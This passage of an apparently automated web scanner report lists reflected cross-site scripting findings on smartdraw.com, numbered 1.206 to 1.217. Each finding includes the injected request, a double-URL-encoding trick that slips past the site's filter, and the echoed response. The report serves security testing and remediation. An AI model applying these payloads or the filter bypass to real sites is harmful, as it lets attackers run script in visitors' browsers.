Set-Cookie: ASP.NET_SessionId=b52255als5xnh545vc0uboia; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22f20b1"style="x:expression(alert(1))"35c6b1442fc/" rel="nofollow" target="_blank">
...[SNIP]...

1.206. http://www.smartdraw.com/training/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec was submitted in the REST URL parameter 2. This input was echoed as 5fc3f"style="x:expression(alert(1))"219d68a09ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training/5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wufgse55k2kojwaw3jekff45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/5fc3f"style="x:expression(alert(1))"219d68a09ec/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.207. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccf51"style="x:expression(alert(1))"a72e20bf002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /training/x22?ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fd1day3lcgnbupjb3jzkvr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22/?ccf51"style="x:expression(alert(1))"a72e20bf002=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.208. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b27"style="x:expression(alert(1))"b6d7f14376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /training/x22?e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4jdjcurlf30fkz4530xla555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22/?e4b27"style="x:expression(alert(1))"b6d7f14376=1" rel="nofollow" target="_blank">
...[SNIP]...

1.209. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b was submitted in the REST URL parameter 3. This input was echoed as 579d3"><script>alert(1)</script>136f2be723b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:57 GMT
Content-Length: 8928
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fzzorg45tqhtbe455jbn02zs; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/579d3"><script>alert(1)</script>136f2be723b/?id=340836/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

1.210. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 was submitted in the REST URL parameter 3. This input was echoed as 20ea8"style="x:expression(alert(1))"ea712677564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/index.htm20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ioghgr45ccy40ubwykcs3pan; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo20ea8"style="x:expression(alert(1))"ea712677564/" rel="nofollow" target="_blank">
...[SNIP]...

1.211. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa was submitted in the REST URL parameter 3. This input was echoed as d00fd"style="x:expression(alert(1))"37b4fa705aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iffsvl2yty0fiq3algupkl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo/d00fd"style="x:expression(alert(1))"37b4fa705aa/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.212. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31 was submitted in the REST URL parameter 3. This input was echoed as 7ebb1"><script>alert(1)</script>7f63dfd6d31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/index.htm7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yawesm55knbvl4mobfmyjr2e; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8921
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo7ebb1"><script>alert(1)</script>7f63dfd6d31/?id=340836/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

1.213. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17 was submitted in the REST URL parameter 1. This input was echoed as 3f3f7"style="x:expression(alert(1))"704a7a40d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wupmsxznbmovt155mvmvxh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/3f3f7"style="x:expression(alert(1))"704a7a40d17/demo/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; he
...[SNIP]...

1.214. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c was submitted in the REST URL parameter 1. This input was echoed as 81e6e"style="x:expression(alert(1))"30c796e241c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vgiqbgv2pky1le45ukty4wfj; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos81e6e"style="x:expression(alert(1))"30c796e241c/demo/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.215. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a was submitted in the REST URL parameter 2. This input was echoed as 2addd"style="x:expression(alert(1))"108d415c1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ra0kk255lzz14izejoevse45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/2addd"style="x:expression(alert(1))"108d415c1a/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.216. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8 was submitted in the REST URL parameter 2. This input was echoed as 5ca5b"style="x:expression(alert(1))"1a726fc0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ygebeo553nhi5mztwrtyso45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo5ca5b"style="x:expression(alert(1))"1a726fc0e8/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.217. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 was submitted in the REST URL parameter 3. This input was echoed as 551b7"style="x:expression(alert(1))"8d874867177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

